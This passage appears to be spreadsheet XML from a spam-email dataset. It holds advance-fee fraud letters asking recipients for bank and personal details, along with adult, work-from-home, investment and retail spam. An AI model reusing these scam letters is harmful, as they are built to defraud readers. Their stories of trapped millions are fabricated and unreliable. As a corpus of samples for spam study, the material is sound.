    <t>http://news.bbc.co.uk http://news.bbc.co.uk http://www.msn.fr</t>
  </si>
  <si>
    <t>2427</t>
  </si>
  <si>
    <t>To: nan\nFrom: mike &lt;mike_robert110@yahoo.com&gt;\nDate: Thu, 17 Aug 2006 09:31:33 -1200</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2006 09:31:33 -1200</t>
  </si>
  <si>
    <t>mike &lt;mike_robert110@yahoo.com&gt;</t>
  </si>
  <si>
    <t>hello from mike</t>
  </si>
  <si>
    <t>Dearest,\n\nMy name is mike Robert Guei, Son of the former military\nhead of state Cote D"ivoire west Afirca Gen Robert Guei who\nwas murdered by rebels on the 19th sept 2002 during coup\nattept ,after the tragic incident I ran to Accra-Ghana for\nmy safety and because some years ago my late father\ndeposited sum of $9,000,000,00.Nine millions dollars in a\nsecurity company here with my name as next of kin.\n\nNow I am looking for a trustworthy person to assist me with\nthe followings:\n\n(1)to assist me with an account where the fund will be\ntransfer to. \n(2)to assist me and invest the money in a profitable\nbusiness in other for me to start a new life over there with\nyou.\n\nI hope you will trust to assist me as your brother or your\nfriend,if so thank be to God because with him all things are\npossible. Your urgent response is well appriciated. \n\nThanks and remain bless, \nmike Robert G. \n\n\n\n----------------------------------------\nUpgrade your account today for increased storage; mail\nforwarding or POP enabled e-mail with automatic virus\nscanning. Visit our member benefits page at\n[URL]https://members.canada.com[/URL] for more\ninformation.\n\n\n</t>
  </si>
  <si>
    <t>403</t>
  </si>
  <si>
    <t>To: R@S\nFrom: Mr.Michael Dohn &lt;m_doh4@zwallet.com&gt;\nDate: Thu, 16 Oct 2003 23:25:18 +0100</t>
  </si>
  <si>
    <t>Thu, 16 Oct 2003 23:25:18 +0100</t>
  </si>
  <si>
    <t>Mr.Michael Dohn &lt;m_doh4@zwallet.com&gt;</t>
  </si>
  <si>
    <t>FROM MR.MICHAEL OF I.B.A !</t>
  </si>
  <si>
    <t>From;  Mr. Michael  Dohn,\nBanque Internationale De L'Afrique,\nLome-Togo. \n\nMy  dear, \n\nI wish this my proposal will not come to you as a surprise. I am Mr. Michael Dohn , with Banque Internationale De L'Afrique with regional office in Lome-Togo. We had a foreign client (Mohamed Mohd Salaheldin)who deposited the sum of  US$7.5million (Seven Million Five Hundred Thousand United States Dollars) with our bank. Unfortunately,this client was among the victims of EGYPTAIR FLIGHT NO.990 that crashed on the 31-10-1999 in U.S.A. Confirmable from the website; [URL]www.cnn.com[/URL] But, since that year after the death of our client, we have not had anybody that comes for the claims of this money as the next of kin to our client. A situation I have monitored closely with my position in our bank. \n\nNow, having monitored this deposit and managed it over the years before and after his death, and hence nobody has showed up as the next of kin for the past years now, I have removed the file to my "private vault". I now humbly solicit for your assistance in this issue. I wish to present you as the next of kin to this our client so as to claim out this money, before it is remmited into the fedral account where other people may aswell claim it directly without going to this lenght. I have taken every necessary precautionary measures  concerning this issue and arrangement has been concluded by me in achieving this goal, provided you will follow my instructions in the process. I am only waiting for your response to enable me move the funds to your agreed safe account. This does not have any risk attached to it as all the internal documentations would be handled by me and every loop holes sealed also provided you give me your assistance and support.\n\nI therefore request you to confirm your interest by a return message and I will furnish you with the full details and what to do concerning this deal. What you stand to gain would be discussed and it is negotiable before the deal commences. \n\nThank you in anticipation of your urgent response to my request stating your wish in this deal.\n\nKind regards,\nMr Michael Dohn. \n+228-917-87-92..\n\n\n\n\n</t>
  </si>
  <si>
    <t>402</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: Thomas Taylor &lt;thomutete@netscape.net&gt;\nDate: Thu, 16 Oct 2003 18:51:45 +0200</t>
  </si>
  <si>
    <t>Thu, 16 Oct 2003 18:51:45 +0200</t>
  </si>
  <si>
    <t>Thomas Taylor &lt;thomutete@netscape.net&gt;</t>
  </si>
  <si>
    <t>Urgent Reply</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day!\nIt is with hope that I write to seek your help in this\ncontext. Firstly,let me start by introducing myself\nproperly to you. My name is Thomas M.Ralph Taylor, the first\nson of President Charles Taylor of Liberia. I got your\nemail address from network directory. I apologize if I\nhave infringed on your privacy.\nYou maybe aware, that my father President Charles\nTaylor has been embattled by rebel forces in my\ncountry, couple with his recent indictment by U.N\nbacked tribunal. These issues, have made world\nheadlines. Visit, [URL]www.liberianews.com[/URL]\nNow my father has accepted to quit power and leave\nLiberia on the arrival of peacekeeping force which\nmight be headed by American troops. But the delay in\ndeploying peace keeping force, has worsen situation in\nthe country. In spite of this, My country Liberia, is\nlike a herd of cattle without shepherd. Rebels Groups\nare still fighting to oust my father and assume office\nas leaders. The rebel who see my family as a threat to\ntheir ambitions, are planning to kill\nevery one of us when capture.\nHowever, I am a young man who has ambitions and I am\nnot in any way interested in wars, this is why I\nsecretly left Liberia for Amsterdam to seek asylum.\nBesides, I am using this correspondence to seek and\nrequest your assistance and cooperation in a sensitive\nbut highly beneficial financial arrangement.\nPrior to the Wars and embattlement of my father,\nhimself and I deposited a huge amount of money in a\nsecurity company?s vault overseas on my name. The\nfunds were arranged into a consignment before\ndeposited with the security company But, the security\ncompany did not know that the consignment contains\nmoney. Because, The consignment was declared to\ncontain family treasure and valuables.\nThe fact that the war persist and we continue to\naccumulate huge debts daily as long as the consignment\nremains in the security company?s vault, made me\ndecided to get someone reliable to proceed as soon as\npossible to receive these funds\nfor investment purpose. As a young man, I plan to use\nthis money to safeguard my future.\nIt is very essential that you understand the kind of\ntrust and confidence I want to put in you. This is an\nact of desperation on my part, in order not to loose\nthis money incase of any eventuality. For your\nreliable assistance, if willing, I will reward you\nwith 25% of the money.\nAs soon as you declare your willingness to assist, i\nshall furnish you with the details and information you\nwill need to accomplish this task. Please, be rest\nassured that this arrangement is absolutely risk free\nAnd cannot implicate you in any way. However, I\nimplore you to handle this matter with urgency, utmost\nsecrecy and confidentiality for security and safety\nreasons, even if you do not intend to execute the\nproject.\nThank you in anticipation for your assistance in\nenabling me achieve this goal. Please contact me\nwhether or not you are interested in assisting me.\nThis will enable me scout for another perosn in the\nevent of non-interest on your part.\nYour?s sincerely,\nMr Thomas M.Ralph Taylor  </t>
  </si>
  <si>
    <t>www.liberianews.com</t>
  </si>
  <si>
    <t>2714</t>
  </si>
  <si>
    <t>To: fsmith@dslextreme.com\nFrom: Dr Latif Abdul &lt;dr_a_latif@hotmail.com&gt;\nDate: Thu, 16 Nov 2006 19:28:37 +0100</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2006 19:28:37 +0100</t>
  </si>
  <si>
    <t>Dr Latif Abdul &lt;dr_a_latif@hotmail.com&gt;</t>
  </si>
  <si>
    <t>fsmith@dslextreme.com</t>
  </si>
  <si>
    <t>STRICTEST CONFIDENCE</t>
  </si>
  <si>
    <t>FROM: Dr.Abdul Latif\nChairman Contract Review Panel,\nAbidjan, Cote D'Ivoire.\nWest Africa.\n\nDEAR FRIEND.\nFirst, I must solicit your strictest confidence in this transaction.\nThis by virtue of its nature as being utterly confidential and TOP\nSECRET.\nI got your contact in our search for a foreign partner who has the\nAbility and reliability to prosecute a transaction of great magnitude\nInvolving a pending business transaction requiring maximum confidence. We \nare top officials of the Federal Government contract review panel who are \ninterested in investment in your country with funds which are presently \ntrapped here in Cote D Ivoire.In other to commence this Business, we solicit \nyour assistance to enable us transfer into your Account the said trapped \nfunds.\nThe source of this fund is as follows: During the last regime here of\nGeneral Robert Guei in Cote D Ivoire some government official's set up \ncompanies and awarded themselves contracts which were grossly over Invoiced \nin various ministries. The government set up a contract review panel and we \nhave Identified a lot of inflated\ncontracts funds which are presently Deposited in a BANK here in Abidjan,Cote \nD Ivoire .\nHowever, by virtue of our position as civil servants and members of the \npanel ,we cannot acquire this money in our name. we have\ntherefore ,been delegated as a matter of trust by my colleagues  to look for \nan overseas partner into whose account we would transfer\nthe total sum of USD$15,500,000.00  (FIFTEEN MILLION,FIVE HUNDRED THOUSAND \nUNITED STATES DOLLARS)\nHence we are writing you this letter. We agreed to share the money\nthus:\n(1) 20% FOR THE ACCOUNT OWNER (YOU)\n(2) 10% FOR MICSELLENIOUS EXPENSES\n(3)70% FOR US (THE OFFICALS)\nIt is from the 70% that we wish to commence investments in your country as \nyou will also stand as our foreign agent over there. Please note that this \ntransaction is 100% safe and we hope to commence the transaction latest \nseven (7) days from the date of the receipt of the following information \nbellow.\n(A) COMPANYS NAME BENEFICIARY OF ACCOUNT.\n(B)YOUR PERSONAL TELEPHONE NUMBER AND FAX NUMBERS.\n(C) BANK ACCOUNT/SORT/ABA/ROUTING NUMBERS\nWHICH THE FUND WILL BE TRANSFERED TO.\n(D) YOUR BANK ADDRESS, TELEPHONE NUMBERS/FAX NUMBERS.\nThe above information will enable us commence the transfer of this\nfunds into your account in your country without delay\nWe are looking forward to doing this business with you and solicit your \nconfidentiality in this transaction.\n\nPlease acknowledge the receipt of this letter using the above email\naddress; I will bring you into the complete picture of this pending\nproject when I hear from you.\nWith Kind regards,\n\nDr.Abdul Latif\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2712</t>
  </si>
  <si>
    <t>To: R@S\nFrom: John Clarke &lt;JohnClarke@diamondsecurities.com&gt;\nDate: Thu, 16 Nov 2006 10:22:48 +0800</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2006 10:22:48 +0800</t>
  </si>
  <si>
    <t>John Clarke &lt;JohnClarke@diamondsecurities.com&gt;</t>
  </si>
  <si>
    <t>Dear Friend,    My Name is John Amane Clarke, managing director of Diamond Security &amp; Storage Company here in Accra- Ghana. In my department, I discovered an abandoned consignment worth over sum of US$12Million dollars (Twelve Million US dollars) in file that belongs to our foreign customer,    LATE MR. ANDREAS SCHRANNER from Munich, Germany who died along with his entire family in July 2000 in a plane crash. Below is a website which I will appreciate you going through to read the information.    [URL]http://news.bbc.co.uk[/URL]   Since then, I have made several enquiries to locate any of his extended relatives but all effort has proved abortive.   The reason why I am contacting you is based on trust to enable me present you as the next-of-kin to him so this consignment will be released to you for safety and subsequent disbursement.    Nobody has come to our company for claiming of the consignment.    It will be easy to convince the company since I am in possession of the necessary legalised documents that backs-up the consignment and which will present you as the rightful next-of-kin to the deceased customer. I don't want this consignment to go into company,s treasury as unclaimed bill.    The company laws and guidelines stipulates that if such consignment remains unclaimed after seven years, the company will confiscate it.    The request for a foreigner as next-of-kin in this transaction is occasioned by the fact that late ANDREAS was a foreigner and any indigene cannot stand as next-of-kin to a foreigner.   All I require is your honest co-operation to enable us see this transaction through. I guarantee that this will be executed under a legitimate arrangement that will protect you from any breach of the law. I agree that 25% of this money will be for you as a respect to the provision of your assistance , 5% will be set aside for expenses incurred during the transaction, another 5% to help the less privilege and to assist the charity organisations here in Africa and abroad while the rest 65% will be for me.    Thereafter, I will visit your country for disbursement according to the percentage indicated. Therefore, to enable the immediate release of this consignment, you must apply to the company as the relation or next of kin of the deceased indicating your complete information, complete name, postal address, occupation, your private telephone and fax number for easy and effective communication and location where the consignment will be release to.    Upon receipt of your reply, I will send to you by fax or email the text of the Application you will send to the company to seek the release of the consignment to you. I will not fail to bring to your notice that this transaction is hitch-free and that you should not entertain any fear as all required Arrangements have been made. You should contact me as soon as you receive this mail. My email address i: johnamaneclarke1@aim.com   Or you can send your number for me to call you. Trusting to hear from you immediately for more detailed discussion.    Regards,   John Amane Clarke.   Managing Director,  Diamond Security &amp; Storage Company Accra, Ghana.</t>
  </si>
  <si>
    <t>4870</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@mandark.labs.netnoteinc.com&gt;\nFrom: stayhnard@yahoo.com\nDate: Thu, 16 May 2002 19:58:48 -1600</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 19:58:48 -1600</t>
  </si>
  <si>
    <t>stayhnard@yahoo.com</t>
  </si>
  <si>
    <t>&lt;Undisclosed.Recipients@mandark.labs.netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Earn 6 figures in 90 days, No Cost Information,</t>
  </si>
  <si>
    <t>Hi-tech industry leader in an emerging 90 billion dollar  environmental marketplace seeks U.S. and Canadian  Entrepreneurs for market expansion. We have an immediate  need and are willing to train and develop aggressive  individuals in local markets.  Candidates must be  motivated individuals with the entrepreneurial drive to  run their own independent business part-time, full-time  or spare-time from home backed with full company support.         START MAKING MONEY FROM HOME with it now!! ----&gt;&gt;&gt;&gt;&gt;[URL]http://www.doubleplushosting.com[/URL]&lt;&lt;&lt;-----  Here are some highlights: Huge compensation benefits program offered: * Uncapped commissions and bonuses. * Qualified Mgrs. part-time avg. up to $6,293/mo. or more! * Top Mgrs avg. over $200k/yr. Total Flexibility: * No commuting necessary! Work from home environment. * P/T or F/T positions available. * Create your own schedule and hours. Company Support: * Each independently run business is backed with full company support. * Up to 99.0% start up funding available, if needed. Complete Training: * Personal one-on-one training by top company leaders. * Proven step-by-step marketing system. * Product sells itself. (No selling or cold calling!). Perks: * Luxury company car ($800/mo). * National/International all expense paid vacations, business or pleasure. * Profit sharing program.                START MAKING MONEY FROM HOME with it now!! ------&gt;&gt;&gt;&gt;&gt;[URL]http://www.doubleplushosting.com[/URL]&lt;&lt;&lt;------ To maintain regulatory compliance, we are unable to name our company in  this ad. However, you will soon discover that our 15 year old privately  held, hi-tech manufacturing company was recently recognized as the 82nd  faster growing U.S. company by INC 500.  We help solve a common problem  that up to 82% or more population suffers from and helps solve it quickly  and easily in a 90 billion dollar untapped marketplace. Candidate profile: * Strong work ethic required. * Honesty and integrity expected. * Management / leadership skills helpful, but not necessary. * No sales experience expected or needed. (Product sells itself!) LOCAL POSITIONS ARE GOING FAST.  Interested parties should respond IMMEDIATELY! ************************************************************* To receive a FREE information pack including an audiocassette and  corporate video on this amazing hi-tech product and how YOU CAN  START MAKING MONEY FROM HOME with it now!! ------------&gt;&gt;&gt;&gt;&gt;[URL]http://www.doubleplushosting.com[/URL]&lt;&lt;&lt;--------------- ------- To Be ExCerted - mailto:abo9@eudoramail.com</t>
  </si>
  <si>
    <t>http://www.doubleplushosting.com http://www.doubleplushosting.com http://www.doubleplushosting.com</t>
  </si>
  <si>
    <t>4869</t>
  </si>
  <si>
    <t>To: &lt;yyyy@preserveapts.net&gt;\nFrom: "Naked Celebs" &lt;msathene@netvigator.com&gt;\nDate: Thu, 16 May 2002 19:33:47 -1600</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 19:33:47 -1600</t>
  </si>
  <si>
    <t>"Naked Celebs" &lt;msathene@netvigator.com&gt;</t>
  </si>
  <si>
    <t>&lt;yyyy@preserveapts.net&gt;</t>
  </si>
  <si>
    <t>Male &amp; Female Celebs...Nude!                     23101</t>
  </si>
  <si>
    <t>SHOCKING PAPARRAZZI NUDE CELEBRITY PICS &amp; VIDEOS!\n\nNaked Male and Female Stars caught on tape! Real\nPhotos and Footage of Celebrities caught Skinny\nDipping, Sun Bathing in the Nude, Cheating, Jerking\nEach Other Off and Feeling Each Other Up in PUBLIC!\n\nThe list of Celebrities is Endless!\nBrad Pitt, Denise Richards, Christian Bale, Pamela\nAnderson, Ricky Martin, Christina Applegate, Antonio\nSabato Jr, Gillian Anderson, Ben Affleck, Jennifer\nLove-Hewitt, Alexis Arquette, Jennifer Lopez......\nAny Celebrity you can think of is here!\n[URL]http://www.celebritysnude.net[/URL]\n\nBonus Material:\nHouston 620, Celebrity Fakes, Amateur Wannabes, Naked\nSoap Stars, barely Legal Celebs, Before the Fame,\nCeleb Date Contest + Much Much More......Enter Now:\n[URL]http://www.celebritysnude.net[/URL]\n\n\n\n\n\n\n\nSend a blank email here to be removed from database:\nmailto:nude_celebs@excite.com?subject=remove</t>
  </si>
  <si>
    <t>http://www.celebritysnude.net http://www.celebritysnude.net</t>
  </si>
  <si>
    <t>4861</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "EMC" &lt;emc@insurancemail.net&gt;\nDate: Thu, 16 May 2002 17:46:04 -0400</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 17:46:04 -0400</t>
  </si>
  <si>
    <t>"EMC" &lt;emc@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>What is EMC Stock to Cash?</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_DD23E_01C1FCF4.FA928290 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  STOCK to CASH=0A= Keep Your Clients' Money Working in Two Places at the Same Time.=0A= Eliminate downside risk, while keeping their upside intact.=09  What is EMC Stock to Cash?=09  	Your client receives 90% of their stock portfolio up front and in cash  	You invest this money in either an annuity, life policy...or both =09  	If the portfolio decreases in value, your clients' investment remains intact =09  	If the portfolio increases in value,=20 your clients receive the upside appreciation  	Reduces capital gains and estate taxes=20  Annuities Protect Stocks=09 S2C allows you to wrap your favorite fixed annuities around your clients' existing stock portfolios, combining the safety features of tax-deferred annuities with the high growth potential of the nation's leading stock indices. Annuities can also be used to fund fixed life insurance policies. =09   _____ =20 Call Tim Armstrong or e-mail   us today!  800-396-3622x5 Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal Notice =20 ------=_NextPart_000_DD23E_01C1FCF4.FA928290 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable What is EMC Stock to Cash? =20       =20          =20              =20              =20             =20                =20                    =20                                            Your client receives 90% of their stock = portfolio                       up front and in cash =20                    =20                                          You invest this money in either an                     annuity, life policy...or both =20                    =20                                          If the portfolio decreases in value,                     your clients' investment remains intact =20                    =20                                            If the portfolio increases in value,                        your clients receive the upside = appreciation =20                    =20                                          Reduces capital gains and estate taxes = =20              =20              S2C=20                 allows you to wrap your favorite fixed annuities around = your clients'=20                 existing stock portfolios, combining the safety features = of tax-deferred=20                 annuities with the high growth potential of the nation's = leading=20                 stock indices. Annuities can also be used to fund fixed = life insurance=20                 policies. =20             =20                                Call Tim Armstrong or e-mail us = today! =20              =20             =20                =20                    =20                        =20                           Please fill out the form below for more = information =20                           Name: =20                              =20                           E-mail: =20                              =20                            Phone: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20             =20               We=20                 don't want anybody to receive our mailing who does not = wish to=20                 receive them. This is a professional communication sent = to insurance=20                 professionals. To be removed from this mailing list, DO = NOT REPLY=20                 to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal = Notice ------=_NextPart_000_DD23E_01C1FCF4.FA928290--</t>
  </si>
  <si>
    <t>4858</t>
  </si>
  <si>
    <t>To: nan\nFrom: kinson@asiamagic.com\nDate: Thu, 16 May 2002 15:48:17 +0100</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 15:48:17 +0100</t>
  </si>
  <si>
    <t>kinson@asiamagic.com</t>
  </si>
  <si>
    <t>Business opportunity!</t>
  </si>
  <si>
    <t>Hello! \n\nThis is Kinson Wong from Asia Magic (HK) Ltd company. \nWe got your company information from internet. I would like to take opportunity to introduce our company.\n \nOur company as a manufacture ourselves. We are supply computer hardware accessories and peripheral such sound card and AGP card.\nWe ensure that our productions and projects at maximum quality yield and be able to fulfill different needs of various levels. We are look forward to do business in the future!!\nIf you want to reply us, please record: kinson@asiamagic.com\n\nNow I can offer those quotation to you: \nSound Card:\nCMedia  8738 PCI Sound Card                    USD 4.50\nCMedia  8738 PCI Sound Card 5.1 channel        USD 6.50\nCrystal 4281 PCI Sound Card                    USD 4.60\nCrystal 4280 PCI Sound Card                    USD 4.60\nCrystal 4620 PCI Sound Card                    USD 4.50\nCrystal 4236 ISA Sound Card                    USD 4.00\nESS     1938 PCI Sound Card                    USD 4.90\nESS     1978 PCI Sound Card                    USD 4.60\nESS     1989 PCI Sound Card                    USD 5.40\nESS     1869 ISA Sound Card                    USD 3.60\nYamaha   715 ISA Sound Card                    USD 4.60\nYamaha   724 PCI Sound Card                    USD 5.40\nYamaha   734 PCI Sound Card                    USD 4.80\nYamaha   740 PCI Sound Card                    USD 5.80\nYamaha   744 PCI Sound Card                    USD 6.20 \n \nVGA Card:\nNvidia Geforce4 Ti4200                                                    USD Coming\nNvidia Geforce4 Ti4400                                                    USD Coming\nNvidia Geforce4 Ti4600                                                    USD Coming\nNvidia Geforce2 MX460     64MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD 111.50\nNvidia Geforce2 MX460     64MB DDRAM w/TV,Bundled w/PowerDVD              USD 106.50\nNvidia Geforce2 MX440     64MB DDRAM w/TV,Bundled w/PowerDVD              USD  79.00\nNvidia Geforce2 MX420     64MB SDRAM w/TV,Bundled w/PowerDVD              USD  58.50\nNvidia Geforce2 Ti200    128MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD 104.50\nNvidia Geforce2 Ti200     64MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD  88.50\nNvidia Geforce2 Ti 2X/4X  64MB DDRAM                                      USD  65.50\nNvidia Geforce2 MX400     64MB DDRAM w/TV                                 USD  45.00\nNvidia Geforce2 MX400     64MB DDRAM                                      USD  40.00\nNvidia Geforce2 MX400     64MB SDRAM w/TV                                 USD  44.50\nNvidia Geforce2 MX400     64MB SDRAM                                      USD  39.50\nNvidia Geforce2 MX200     32MB DDRAM w/TV                                 USD  38.50\nNvidia Geforce2 MX200     32MB DDRAM                                      USD  33.50\nNvidia Geforce2 MX200     32MB SDRAM w/TV                                 USD  36.00\nNvidia Geforce2 MX200     32MB SDRAM                                      USD  31.00\nNvidia Geforce2 MX200     64MB SDRAM w/TV                                 USD  39.00\nNvidia Geforce2 MX200     64MB SDRAM                                      USD  34.00\nNvidia TNT M64 2X/4X      32MB SDRAM w/TV                                 USD  28.40\nNvidia TNT M64 2X/4X      32MB SDRAM                                      USD  23.40\nNvidia TNT                16MB SDRAM                                       USD   CALL\nNvidia TNT                 8MB SDRAM                                      USD   CALL\n \nATI LT Pro             8MB SDRAM w/TV                     USD   9.50\nATI IIC                8MB SDRAM                          USD   9.00\nATI Rage Pro Turbo     8MB SDRAM                          USD   9.00\nATI Rage 128 Pro      32MB SDRAM                          USD  24.00\nATI Rage 128 Pro      32MB SDRAM w/TV                     USD   CALL\nATI Radeon VE 2X/4X   32MB SDRAM                          USD  35.00\nATI Radeon VE         32MB SDRAM w/CRT                    USD   CALL\nATI Radeon VE         32MB SDRAM w/CRT+TV+CRT             USD  45.50\nATI Radeon VE         64MB SDRAM w/TV                     USD   CALL\nATI Radeon VE         64MB SDRAM w/TV/CRT                 USD   CALL\nATI Radeon VE         64MB DDRAM w/TV                     USD   CALL\nATI Radeon 7500LE     64MB DDRAM w/CRT+TV+CRT w/PowerDVD  USD  57.50\nATI Radeon 7500       64MB DDRAM w/TV/DVI                 USD   CALL\nATI Radeon 8500       64MB DDRAM w/CRT+TV+CRT w/PowerDVD  USD 135.50\n \nS3 Savage4 397 4X     32MB SDRAM               USD 20.00\nS3 Trio 3D 368 2X      8MB SDRAM               USD  Call\n \nSIS 305               32MB SDRAM               USD 19.00\nSIS 315E              32MB SDRAM               USD 21.50\nSIS 6326               8MB SDRAM               USD 10.00\nSIS 6326 PCI           8MB SDRAM               USD 10.50\n \nTrident 9750           4MB SDRAM               USD  9.50\nTrident 9750 PCI       4MB SDRAM               USD  9.50 \n \nNetwork Product:\nIntel(Ambient)PCI 56k Int. Fax Modem w/voice   USD  8.30\nMotorola      PCI 56k Int. Fax Modem w/o voice USD  7.00\nRockwell      PCI 56k Int. Fax Modem w/voice   USD  8.00\nRockwell      PCI 56k Int. Fax Modem           USD  7.30\nRealtek       PCI 10/100 8139C Lan Card        USD  3.95\nRealtek       PCI 10/100 8139C Lan Card w/WOL  USD  4.00\nRealtek        PCI 10/100 8139D Lan Card          USD  3.70\nESS 2838      PCI 56K Int. Fax Modem w/o voice USD  7.00\nLucent        PCI 56K Int. Fax Modem w/o voice USD  7.60\n \nController Card:\nPCI 4+1 Ports USB 2.0 Controller Card          USD 13.50\nPCI 3+1 Ports Firewire 1394 Controller Card\n    (No Cable)                                 USD 12.00\niLink Cable                                    USD  2.30\n2-Port PCI USB Host Card                       USD  5.50 \nUlead Video Editor Ver 5.0                     USD  3.80\n \nAll subject final re-confirm. \nTotal order value over USD 10,000. FOBHK\nBelow, FORHK.\nPrice based on Bulk packing, with Driver and Manuel.\n \nBest regards\nKinson Wong\n*********************************************\nASIA MAGIC (HK) LTD.\nUnit 11, 7/F., Harry Industrial Bldg., \n49-51 Au Pui Wan Street,\nFotan, Shatin. N.T. Hong Kong.\nTel: 852-26982550\nFax: 852-26983186\nMobile: 96687523\nE-mail: kinson@asiamagic.com\nWebsite: [URL]www.asiamagic.com[/URL]\n*********************************************</t>
  </si>
  <si>
    <t>www.asiamagic.com</t>
  </si>
  <si>
    <t>4856</t>
  </si>
  <si>
    <t>To: mailings@ticketmaster.co.uk\nFrom: mailings@ticketmaster.co.uk\nDate: Thu, 16 May 2002 12:14:56 +0100</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 12:14:56 +0100</t>
  </si>
  <si>
    <t>mailings@ticketmaster.co.uk</t>
  </si>
  <si>
    <t>Save 5.00 on Creamfields tickets</t>
  </si>
  <si>
    <t>Creamfields\nSaturday 24th August 2002 2pm-6am (licence granted)\nOld Liverpool Airfield\nSpeke Road, Liverpool\n\nCreamfields. It's What August Bank Holidays Are for.  \n\nCreamfields is the most intense, chilled out, full on, laid back experience you can cram into one day.  Creamfields is the only award-winning dance festival. It's the only festival to feature the best live acts on an outdoor stage, leaving the arenas to the DJs. Creamfields is the best of Cream, Bugged Out!, Global Underground, Subliminal, Passion, Pacha Futura, Frantic, Nukleuz, Bacardi B Bar and Sunday Best. It Just Gets Better.\n\nTo help get the party started (right), Ticketmaster have negotiated an exclusive offer of 5.00 off the normal price of tickets making the tickets just 41.00 plus booking fee.\n\nBook here NOW. This offer is only available until 22 June*\n\n[URL]http://www.ticketmaster.co.uk[/URL]\n\nThe line-up includes:  \n\nFAITHLESS\nUNDERWORLD\nMIS-TEEQ DJ SHADOW\nKOSHEEN LEMON JELLY STANTON WARRIORS BENT FC KAHUNA\nLAYO AND BUSHWACKA (live) A MAN CALLED ADAM DIRTY VEGAS\n\nPAUL OAKENFOLD, SASHA, DEEP DISH, PETE TONG, DAVE CLARKE, TIMO MAAS, \nDJ TIESTO, ERICK MORILLO, SEB FONTAINE, XPRESS 2, JUDGE JULES, YOUSEF, TALL PAUL, FERGIE, STEVE LAWLER, LOTTIE, NICK WARREN, SANDER KLEINENBERG, FERRY CORSTEN, ARMIN VAN BUUREN, JOHN KELLY, SANDRA COLLINS, JUSTIN ROBERTSON, UMEK, JON CARTER, JAMES ZABIELA, JFK, GUY ORNADEL, SCOTT BOND, CORVIN DALEK, ROB DA BANK, PAUL BLEASDALE, JAN CARBON, ANDY CARROLL, RICHARD SCANTY\nAnd many, many more\n\n\n*The offer is strictly subject to availability and does not apply to tickets already purchased.\n\nTo stay up to date with other new events on sale, sign up for Ticketmaster's weekly Ticket Alert email newsletter. [URL]http://www.ticketmaster.co.uk[/URL]\n\nPlease do not reply to this email, as you will not get a response. To remove yourself from this mailing list, please email here: mailto:unsubscribe@ticketmaster.co.uk and write "Unsubscribe" in the subject line. For all other enquiries, visit our help page: [URL]http://www.ticketmaster.co.uk[/URL]</t>
  </si>
  <si>
    <t>http://www.ticketmaster.co.uk http://www.ticketmaster.co.uk http://www.ticketmaster.co.uk</t>
  </si>
  <si>
    <t>4862</t>
  </si>
  <si>
    <t>To: &lt;VALUED_CUSTOMERS@mandark.labs.netnoteinc.com&gt;\nFrom: "Jason Howard" &lt;erienw9@wam.co.za&gt;\nDate: Thu, 16 May 2002 07:43:37 -1700</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 07:43:37 -1700</t>
  </si>
  <si>
    <t>"Jason Howard" &lt;erienw9@wam.co.za&gt;</t>
  </si>
  <si>
    <t>&lt;VALUED_CUSTOMERS@mandark.labs.netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Free info.  Start your Own Internet Consulting Business NTSJ</t>
  </si>
  <si>
    <t>Did you know 4 of the country's 10 richest people never graduated from college?\n\nThey had the courage to dream, and the wisdom to\ntake advantage of opportunities.\n\nDo you have the Courage and the Wisdom to \nchange YOUR life?\n\nYOU DESERVE SUCCESS!\n\nChecking out this web site is free, and it could pay off in the form of\na dramatically improved lifestyle for you and your loved ones.\n\nYou will never know unless you check it out NOW!\n\nInvest JUST ONE minute to check out this website right now.\n\n[URL]http://www.22freewayexit2284.net[/URL]\n\n\n\nIf you would like to be removed from all future mailings just\nsend and email to erienw3943@freemail.hu</t>
  </si>
  <si>
    <t>http://www.22freewayexit2284.net</t>
  </si>
  <si>
    <t>4857</t>
  </si>
  <si>
    <t>To: Registrant32@mandark.labs.netnoteinc.com\nFrom: &lt;lena_taylor@doneasy.com&gt;\nDate: Thu, 16 May 2002 00:29:49 -1100</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 00:29:49 -1100</t>
  </si>
  <si>
    <t>&lt;lena_taylor@doneasy.com&gt;</t>
  </si>
  <si>
    <t>Registrant32@mandark.labs.netnoteinc.com</t>
  </si>
  <si>
    <t>new domain extensions are now affordable</t>
  </si>
  <si>
